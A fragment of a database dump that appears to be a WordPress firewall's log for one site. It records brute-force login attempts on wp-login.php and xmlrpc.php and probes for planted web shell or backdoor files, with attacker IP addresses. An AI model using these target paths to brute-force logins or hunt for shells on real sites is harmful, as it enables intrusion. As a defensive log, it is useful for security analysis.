|cteisys.com/wp-login.php',0,0,0),('151.106.41.64',2540316992,'newd',0,1664082373.3739,7,'jVluTAJEhCiQBGNrUYsz5gyD','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('118.24.106.172',1981311660,'newd',0,1664083200.9654,7,'QYoTwIPHCScKzMBvalqUNh3J','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('173.44.55.179',2905356211,'joyce',0,1664083461.6442,152,'B8IQyDhrXvbKGPHRlpC91Ffa','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.99.201.91',3227765083,'newd',0,1664083940.5015,7,'rt0BXqlYUx36QucsaLzFA4VC','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('57.128.45.42',964701482,'',0,1664084688.3265,55,'rfl9FuxmTabsyG3jCcYEw45N','','19|0|0|0|cteisys.com/ups.php',0,19,0),('57.128.45.42',964701482,'',0,1664084703.7458,55,'DTkqZU0sp79du1fHNl2nzPBj','','19|0|0|0|cteisys.com/ups.php',0,19,0),('57.128.45.42',964701482,'',0,1664084710.1377,55,'RD52QjqmcpWN4GHLo3BKMy1g','','19|0|0|0|cteisys.com/ru.php',0,19,0),('57.128.45.42',964701482,'',0,1664084715.7551,55,'6wntegZ2YWuxQEalc81R0ODC','','19|0|0|0|cteisys.com/ru.php',0,19,0),('91.207.57.115',1540307315,'joyce',0,1664085355.1664,152,'ygTfqXn9lw3Yzv5RjS7hDF4o','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.89.109.117',2673438069,'newd',0,1664085456.6762,7,'Mf7yepHwDboRTv3C01NLXscF','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('46.183.216.163',783800483,'joyce',0,1664086042.9498,152,'ZYJeKUysSIx4XPHV2cuTbphW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('157.230.127.126',2649128830,'newd',0,1664086284.9166,7,'RCcPyl0U6Kxe2XoLFzA1YTIQ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.91.220.143',861658255,'newd',0,1664087003.5729,7,'fCXOZTbi5dyHxWLjSp0vUgK2','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('188.166.61.228',3165011428,'newd',0,1664087804.9468,7,'WKNdBI8qA9sRrxHtfQVwpuLE','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('34.69.109.132',574975364,'newd',0,1664088515.9907,7,'6peqcBgjfIwNSOtRsdxrC8iu','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('54.37.156.240',908434672,'newd',0,1664089310.9059,7,'G3AMtSlZfId0hrDOzxmcFkuE','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('194.38.20.161',3257275553,'',0,1664089395.0735,55,'OheUkxJB6VNEMb9t0nq8C73w','','19|0|0|0|cteisys.com/wp-content/themes/Famous/megaframe/megapanel/inc/functions.php',0,19,0),('82.102.23.131',1382422403,'joyce',0,1664089553.1094,152,'ONSUeyEVq2wmognc6JvMpkH0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.98.49.240',3328324080,'Joyce',0,1664089864.2941,51,'P2xDQfoCkmn5ZLlb6RjqIs8H','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('104.41.221.5',1747574021,'newd',0,1664090004.4905,7,'rtnRLCJeWgIcuFXP46kUQwAO','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('128.199.14.4',2160528900,'newd',0,1664090803.8753,7,'jJKZet6AsE9I31FrU0xTWSVv','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.162.104',3583550056,'joyce',0,1664090959.6634,152,'MONintG2HcUICTBZ7rqplmwD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.38.192.91',858177627,'newd',0,1664091490.9026,7,'a7yVvA3Q89FqgGOsrNBkmYRH','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('37.120.132.91',628655195,'joyce',0,1664091609.7555,152,'w1Vz34diTBuCOXSpclM2QZI6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('141.98.102.243',2372036339,'joyce',0,1664092166.5922,152,'jJZuocR8NO54rmSs9zAP2Kn3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.223.170.181',2682235573,'newd',0,1664092295.9276,7,'3gjZuh1fDz7E85PCG9Bxq64t','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.130.218.178',1736628914,'newd',0,1664093809.8475,7,'PbAVxuqcJNW7CsZjhIR0THO1','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('93.114.185.76',1567799628,'newd',0,1664094511.0331,7,'gJfUDV2rETGzM9pwBdkACeaS','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('121.42.231.47',2032854831,'newd',0,1664095326.5541,7,'dxeyBJbZCM18Oc3WIikVNEwj','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('124.106.71.219',2087339995,'newd',0,1664096036.9417,7,'j4AwEJ0cl8p5IfnKqMHXTRts','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('75.119.157.181',1266130357,'newd',0,1664096827.5037,7,'y3W2RAKtzBwdMb4lXTEP0Yhc','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.195.148.190',868455614,'newd',0,1664097545.3093,7,'rgXWbsZv5tUo6LuPHJ8OFyM4','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.2.5.77',3103917389,'newd',0,1664099081.8161,7,'5eTmP9H0ADznao8FY6jBsWdl','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('111.230.202.147',1877396115,'newd',0,1664099863.5659,7,'3ORANELv7o9UZSpQWnrxbc8G','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('62.102.148.160',1046910112,'joyce',0,1664105298.9121,152,'16vLHpxRbd5hcNrzD2oMST7w','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.162.5',3583549957,'joyce',0,1664105731.3027,152,'xy80JAZ6jchfM74UOItBkFSX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.88.52.8',1364734984,'newd',0,1664106049.4870,7,'uZI4is3wRoqar7ymU5QTOl0D','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('217.138.252.123',3649764475,'joyce',0,1664106311.9316,152,'a1QPtMzG7LEio2qfBkJpslXV','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('69.163.196.200',1168360648,'newd',0,1664106782.3097,7,'wqgpzxAUD8lWQaGnj6o52k4y','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('82.102.23.139',1382422411,'joyce',0,1664106890.1633,152,'hy6dDjIAn1wKBsUX9lEMaiJq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('146.70.115.139',2454090635,'joyce',0,1664107128.4267,152,'GRkdcZbp6fgCy351tezvAM4K','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.161.15',3583549711,'joyce',0,1664110219.2791,152,'e0TnJaoZgDPA41b9dWVkfy2p','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('125.227.127.195',2112061379,'newd',0,1664110713.8651,7,'xkqTaOX7domGnHhRQZCPYvpV','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.159.155.6',866097926,'newd',0,1664116124.3614,7,'xiqzUEAup1TrZCtVK4Q2D8jv','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('161.35.126.102',2703457894,'newd',0,1664116940.1603,7,'3Hk074mCQAeoEDypU28IGrMY','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('35.187.58.136',599472776,'newd',0,1664117679.3514,7,'4GiDFM2CEquANmw7loHYz0pI','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('184.75.221.171',3091979691,'joyce',0,1664117952.7973,152,'VBuYXP6STKUOJNG1oIt3HEQp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.215.217.77',2732054861,'newd',0,1664155678.1496,152,'DTeuSL7wEYngsiHXVxN0OA5I','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('2.184.67.138',45630346,'newd',0,1664156498.4289,152,'dEwml09pL2afB7Akch51iDje','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('165.227.195.28',2783167260,'newd',0,1664157110.4768,152,'LmpNGhObaBgVdMRtQrHCZEcs','','0|0|0|0|cteisys.com//xmlrpc.php',0,0,0),('165.227.195.28',2783167260,'newd',0,1664157111.5350,152,'O3ZimQEcUdTvaPb7GYC9srVq','','0|0|0|0|cteisys.com//xmlrpc.php',0,0,0),('165.227.195.28',2783167260,'newd',0,1664157112.6642,152,'ct90vJEx1B5fnPAUGIroTVFZ','','0|0|0|0|cteisys.com//xmlrpc.php',0,0,0),('35.211.94.153',601054873,'newd',0,1664157312.8818,152,'vRKDSMmbyAdGthZVczgNOrHl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('95.173.161.171',1605214635,'newd',0,1664159006.7299,152,'6jnodGFrHD3Tsy2VJK7iQqup','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('141.98.102.243',2372036339,'joyce',0,1664159820.1486,152,'Ybvc3B6Or7lWSRasUuDP5iNz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.153.214.231',1738135271,'newd',0,1664159820.1615,152,'5cSFum78krDYn1PXpOfW4ibU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('165.232.183.66',2783491906,'newd',0,1664160660.6183,152,'y9zZ5gqHr7Eth2PuDN04jLld','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.90.235.70',1734011718,'newd',0,1664162892.0112,152,'KAML5lDwhjBnrs1ptXVObo6S','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.27.238.234',1729883882,'newd',0,1664163771.9681,152,'Xf6LGAMuvzrHesmE05VpUoDk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.113.149.124',3497104764,'newd',0,1664164596.8349,152,'nJ8Ie4dDrR9Zutm6QVCyNajv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.166.182.177',1738978993,'newd',0,1664167983.5573,152,'XgIbr4atsQpnAzBTLOf2CNhF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.113.149.124',3497104764,'newd',0,1664171463.4786,152,'alCAzBX1YwE9IKteRyT2p4FH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('199.249.230.12',3355043340,'joyce',0,1664171495.5939,152,'fPoL6AsI8YgGn5jtHZKS1JzU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('173.44.55.179',2905356211,'joyce',0,1664172849.6725,152,'BlxdjgLtenTpzYuZiwyv1bIA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.252.31.179',3120308147,'newd',0,1664173222.9595,152,'aOwtSUHlYzg3AFPJpbfQcr4i','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.252.31.179',3120308147,'newd',0,1664174119.5373,152,'tZsNf6uGvaSXFxPO8kVp7lB2','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.56.160.61',1731764285,'newd',0,1664175011.2889,152,'i0ZCM8FrBEkTDxanymfb3Ysd','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('212.33.197.207',3558983119,'newd',0,1664177860.3559,152,'zw6t9XFuphKPa4RLlcsCveEM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('149.255.58.65',2516531777,'newd',0,1664178306.4883,152,'SMjZCXdA9GYuPmihpUwyqNVH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('93.113.111.100',1567715172,'newd',0,1664179071.9417,152,'jrWxL8tbUoBVROQPA0unC2NY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('88.135.37.49',1485251889,'newd',0,1664181501.1563,152,'tMVbAuf7Skao14vimXrYUxy6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.227.178.147',3236147859,'newd',0,1664181865.4822,152,'HSyNPqVgAZhL0e9BWD8Tu7pY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('203.112.72.51',3413133363,'newd',0,1664182238.9440,152,'6KBIGvE21DFCLJgdcaOPbmf5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.79.30.143',860823183,'newd',0,1664186423.1173,7,'uyURqBJE49vGrzmhTniCFW5H','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('57.128.45.42',964701482,'',0,1664186866.3459,55,'8SVeLM51zwbgdp43FkmlqGIs','','19|0|0|0|cteisys.com/wp-includes/shell20211028.php',0,19,0),('57.128.45.42',964701482,'',0,1664186874.5245,55,'DUpsZSy0fkAC937crmNdnJXq','','19|0|0|0|cteisys.com/wp-includes/shell20211028.php',0,19,0),('103.153.214.231',1738135271,'newd',0,1664187057.3785,7,'HOepCuZl0KG1cNEnP4Mf9diA','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('35.194.233.240',599976432,'newd',0,1664187668.9946,7,'8uFhXMzSAdiGtsJv9DWm72cn','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('128.199.134.216',2160559832,'newd',0,1664188265.0908,7,'4pYVnrWKE5Cwo3TiPLH1tjcz','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('139.59.117.30',2335929630,'newd',0,1664188873.4012,7,'pmcKziND2FvOhfePR9qXkIyT','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('65.1.110.138',1090612874,'newd',0,1664189504.8358,7,'wSg76s3XC9odhl5RNvHfOUei','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('65.1.110.138',1090612874,'newd',0,1664189647.7108,7,'DpdKzCWE3qcjBsn6197QYbXO','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.252.31.179',3120308147,'admin',0,1664192200.0419,51,'CVYN5Xjc8emQIg0spdKuZwhO','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('107.180.247.212',1807022036,'admin',0,1664192827.7120,51,'rtu3SZyPesFcvwL7K2NpOhgH','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('101.43.127.191',1697349567,'admin',0,1664193410.8828,51,'qitZp3m259awJslWvVgeXQTR','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('203.112.72.51',3413133363,'wadminw',0,1664197046.4367,152,'CrQKsw5hGPT7EoL8BaAb9ZV1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('93.113.111.100',1567715172,'admin',0,1664198862.0465,152,'q7jWBUdzrmFTls3owyS4KH26','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('138.197.144.236',2328203500,'admin',0,1664199173.9929,152,'uXVqMKxadhCt74GT53AJBHIb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('43.205.46.185',734867129,'newd',0,1664199559.1877,152,'T1dtep7kxVFCiQN9cHqSL50o','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('130.61.143.194',2185072578,'newd',0,1664200553.9817,152,'cRIiNBvO2b5dj6npQDLHMo8V','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.219.250.15',2732325391,'newd',0,1664200883.1262,152,'jVQfFPGzHD2WB7ROo1AUpItm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.65.149.229',2671875557,'newd',0,1664201291.3199,152,'U7oJiH0AXZhOr5MTWIvqgL1w','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.172.79.125',2813087613,'newd',0,1664202048.7691,152,'Sm8U5KMBtLxJqeRrju60CyTz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('34.68.97.70',574906694,'newd',0,1664202453.4458,152,'wGvTaNeC6D7zqP20W8HOif5t','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.210.196.65',3235038273,'newd',0,1664202861.4970,152,'7eqksQroSJOTIPfbH593XmAD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.154.177.165',1738191269,'newd',0,1664203220.1874,152,'vPaWw30ptyX2SbqAB5ZUrR7e','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.219.250.15',2732325391,'newd',0,1664204008.1744,152,'N7QnjkcbXqSVGze5hMLWaY2y','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('193.176.230.188',3249596092,'newd',0,1664204409.1700,152,'faop4Pg5WhBln760KTqHIxtN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.128.187.183',2994781111,'newd',0,1664209352.1228,7,'N3gITRfSP685b9vrGqKCLcBA','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('208.113.171.103',3497110375,'newd',0,1664210332.4845,7,'fyrPWTmviO8kBc1QS2jNMqYA','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.130.219.13',1736629005,'newd',0,1664211309.7098,7,'f7cCthRidBbOJ5wHplA0yg3V','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('184.75.223.195',3091980227,'joyce',0,1664214587.9213,152,'hoiOLqnR0W1vrb5IMfuk2eQ7','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.187.58.136',599472776,'newd',0,1664217185.8828,7,'9i2aKILSzAudYhCMl4RTvFgm','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('109.168.97.89',1839751513,'newd',0,1664218149.5642,7,'dTCQW9oaceNwgs5vGuJIr1kp','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('194.38.20.161',3257275553,'',0,1664218817.2681,55,'RISpKiVfusWraToAGQ9dczl5','','19|0|0|0|cteisys.com/wp-content/themes/famous/megaframe/megapanel/inc/functions.php',0,19,0),('187.32.211.193',3139490753,'newd',0,1664219111.1827,7,'7254o9icx1zvHXNaLGSAKdWe','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('104.248.124.41',1761115177,'',0,1664227341.8992,55,'1So3nlrvjUFIKTgB5YXubHGN','','19|0|0|0|cteisys.com/1index.php',0,19,0),('104.248.124.41',1761115177,'',0,1664227341.9019,10,'1So3nlrvjUFIKTgB5YXubHGN','','707|0|0|0|cteisys.com/1index.php',0,707,0),('104.248.124.41',1761115177,'',0,1664227342.8160,100,'kbWZiACwy2nHIJlGedRzOBmx','','13|0|0|0|cteisys.com/',0,13,0),('104.248.124.41',1761115177,'',0,1664227343.7456,100,'3VZN5adMSr9njYtXEqg641o8','','13|0|0|0|cteisys.com/load.php',0,13,0),('104.248.124.41',1761115177,'',0,1664227344.8643,100,'pfwnsNF5UDHjCzV73yaoMXbA','','13|0|0|0|cteisys.com/wikindex.php',0,13,0),('104.248.124.41',1761115177,'',0,1664227345.6685,71,'jJEYOohZanBdyt4Pxpc3KuwL','','13|0|0|0|cteisys.com/xmlrpc.php',0,13,0),('104.248.124.41',1761115177,'',0,1664227345.6693,100,'jJEYOohZanBdyt4Pxpc3KuwL','','13|0|0|0|cteisys.com/xmlrpc.php',0,13,0),('69.163.152.108',1168349292,'newd',0,1664227705.6787,7,'RaF2JXk5pt16DTfPOQoIGjV8','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('147.135.255.8',2475163400,'newd',0,1664228655.6104,7,'1MNl4XIO6gyeB9bsKxruQ8dP','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('110.40.244.196',1848177860,'newd',0,1664229586.6694,7,'exa5EMQzlgGPndyZkthoAbiX','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('144.217.15.207',2430144463,'newd',0,1664232508.1441,7,'FkUJmS2GaX6vCy73fWilxZHb','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('85.146.18.88',1435636312,'newd',0,1664235426.8634,7,'omghERbAOlYLHMjB2VWr6yXP','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.56.160.61',1731764285,'admin',0,1664235816.1221,152,'6DoynueMpTrSLQ2gUwWi7Zvf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('212.103.4.29',3563521053,'newd',0,1664236412.2436,7,'It9BuFJHwkGeCSiNP6E8n4z1','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('62.90.101.113',1046111601,'newd',0,1664236446.9882,152,'QT0ELksMR6fXgC8tD15NS3me','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.136.54.132',3330815620,'newd',0,1664236474.3492,152,'sGVMTknZYjWOg0Npm7xv3B5A','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('212.38.40.215',3559270615,'newd',0,1664237792.5170,152,'aPAyxOnwYsoJQtfKhlmEpNvV','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.35.64.73',1730363465,'newd',0,1664237792.9818,152,'wz3WAebCS854YqPlfmpQxaZM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('20.101.71.221',342181853,'newd',0,1664238380.9307,7,'6agwL3jNyXUHvb5fiPSWIoux','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.197.195.173',3116745645,'newd',0,1664238446.0885,152,'fAgBtnewWkUHZ1VDc8TmLN24','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('146.70.61.147',2454076819,'joyce',0,1664238461.4468,152,'g52tUmRFkOoPGqu1KfIpbDLS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('190.92.159.48',3193741104,'newd',0,1664238478.9670,152,'kcL6t2XDjnKvQfAGUpz1Mu38','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.68.87.46',1363433262,'newd',0,1664239127.2542,152,'KSVTI5z0lue7UXJPhtWfBNF9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('161.35.52.207',2703439055,'newd',0,1664239365.6555,7,'Nwi0dMebVApRZCkgoHvcP1Kt','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('209.58.173.138',3510283658,'joyce',0,1664239808.6266,152,'YGT84uzMiVqhFU0ZBxydK5Jl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('64.20.39.18',1075062546,'newd',0,1664239808.7926,152,'3azRYQ0SPUIoprWlqZNAO5G7','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('157.0.140.186',2634058938,'newd',0,1664239850.1762,152,'dfOEk6YbPQHAghILutiJm9vl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('57.128.45.42',964701482,'',0,1664240263.6711,55,'vhIlPj425FWpNAOqYRB3MdwQ','','19|0|0|0|cteisys.com/wp-commentin.php',0,19,0),('57.128.45.42',964701482,'',0,1664240270.3297,55,'7bfB6oWzDgiJFZEP1XHNuC0m','','19|0|0|0|cteisys.com/wp-commentin.php',0,19,0),('167.71.63.47',2806464303,'newd',0,1664240352.8883,7,'EsCILW6uifA31dxcTPkaQ04Y','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('39.108.148.88',661427288,'newd',0,1664241341.2429,7,'TCPdEF1h4ZQRspDx7gc6La02','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('151.80.67.229',2538619877,'',0,1664241563.3912,55,'H4MLyIngr1ClPsKwhciOvJUX','','19|0|0|0|cteisys.com/wp-static.php',0,19,0),('103.35.64.73',1730363465,'newd',0,1664241827.9550,152,'gO8A6R0imwaqHdSGnWFhjExN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('111.90.145.188',1868206524,'newd',0,1664241847.4069,152,'1n9jDtRNov5Q7aZuUw6WMsrg','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('141.94.247.170',2371811242,'newd',0,1664242348.6158,7,'BpViNHTDJ6ZeXjm95k2IzOrR','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('194.163.132.194',3265496258,'newd',0,1664242520.0158,152,'GxSpCKuaF69OEDWMQXehgsfI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('43.225.53.24',736179480,'newd',0,1664242553.4364,152,'vtWuNEVCRTaOI78n5UZ10Psm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.56.160.61',1731764285,'newd',0,1664243207.9587,152,'i5OkJTwmb2oRxzfpCIXELKnZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.252.31.179',3120308147,'newd',0,1664243221.1111,152,'hMyAHoWNkue10ztR3QPg7BwI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.2.4.134',3103917190,'newd',0,1664243315.7006,7,'WYAHlTyQZEd9P5njwXeKrVhp','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('82.165.184.76',1386592332,'newd',0,1664243902.7590,152,'V3XpOdUT7PitLCEBWf2jrJZM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('111.90.145.188',1868206524,'newd',0,1664243910.4712,152,'s5roSH7PbWBGtzAuNxKIeDgX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.55.44.23',758590487,'newd',0,1664244315.1209,7,'kw93e4yY5cSIgOQs1vAxiofG','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.126.219.43',3112098603,'newd',0,1664245330.7103,152,'c5omE1vrPD4ijGITk8OKF0zA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.163.132.194',3265496258,'newd',0,1664246011.2309,152,'gEj3Stik5sH0yn4JWqXdvpLG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('61.219.171.85',1037806421,'newd',0,1664246047.3281,152,'zeGbAjfwFKspl081V7PCOS4c','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.192.104.56',599812152,'newd',0,1664246291.5457,7,'jEHrnF2wztLCds71qNDJoW05','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('162.144.49.214',2727358934,'newd',0,1664246714.3791,152,'rj5yKkhFwsaLvZ6CDcdbH2Ux','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.14.71.142',2718844814,'newd',0,1664246714.9259,152,'F589qaHzCIBQVUT3gDSYJK7p','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('77.240.13.186',1307577786,'newd',0,1664247280.7915,7,'oscez5MlDGyUXK1V6ZgS8WrO','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('172.104.81.115',2892517747,'newd',0,1664248372.4346,152,'qr34xLgcUpJDoGaPiBMuIzEf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.72.244.254',2487809278,'admin',0,1664249118.4783,152,'c0ATbXQOdzSxoDEMtN8UrsgB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.205.143.236',1137545196,'admin',0,1664249153.6197,152,'Orm2ZqB9ifcnhusvRybDHwQA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('62.102.148.164',1046910116,'joyce',0,1664249554.1661,152,'qcL6CfK80Ex2e9MXlRUgyGhH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.56.160.61',1731764285,'admin',0,1664249850.0109,152,'uUPKWp0Michd2rR1OvIeQngk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('145.239.30.120',2448367224,'newd',0,1664250271.6039,7,'lD6UGoJY5MwAjyLWRczdeZt3','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.90.232.106',1734010986,'admin',0,1664250330.4373,152,'0UgpmRF4t2YrSenOAbfLJ9zq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('109.234.161.93',1844093277,'admin',0,1664250368.8545,152,'qAMtPaTnb9LNX5R1ZwSHmBYz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('142.93.132.111',2388493423,'admin',0,1664250798.2804,152,'Fwvc3LTWXN9hbPuRe5qfVOdK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.210.99.98',869426018,'admin',0,1664250815.3305,152,'fYD3H8mvzdJXEUyFNg0sTq9M','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.233.89.214',3270072790,'admin',0,1664251181.4037,152,'6Lhe9Mos8DXjrwvgmUORnHf0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.149.103.132',3583338372,'admin',0,1664251981.9930,152,'X4dHE8BOaDLQKcxv5spStVeM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('151.80.20.26',2538607642,'admin',0,1664251981.9931,152,'z5XNl29ISfW7UQjrpPMtgymq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.162.84',3583550036,'joyce',0,1664252184.6771,152,'GLbxWaj07yrtCeQOX9pkdmcq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.120.69.121',762856825,'newd',0,1664252247.3346,7,'qGIuNn8FMipBlX2bArz97mtk','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.166.182.177',1738978993,'admin',0,1664252346.4349,152,'HdpX4i26rwQTtJzl0W3kP5m9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.162.84',3583550036,'joyce',0,1664252569.4511,152,'NwzVf0iHkpTt2y4SvlLEXmhR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.163.132.194',3265496258,'admin',0,1664252721.6044,152,'O1CyWhfuvsVaX7zPp8KoIUi9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.72.244.254',2487809278,'admin',0,1664253062.2501,152,'sg7hK8SiT4afrVRUuFdmolQB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.107.33.26',795549978,'admin',0,1664253418.3475,152,'JqiVwsPQ0WcbE7lRYmKkp2f1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.210.196.65',3235038273,'admin',0,1664253431.5302,152,'CMI7LJEbwHkjhg0ZeqzO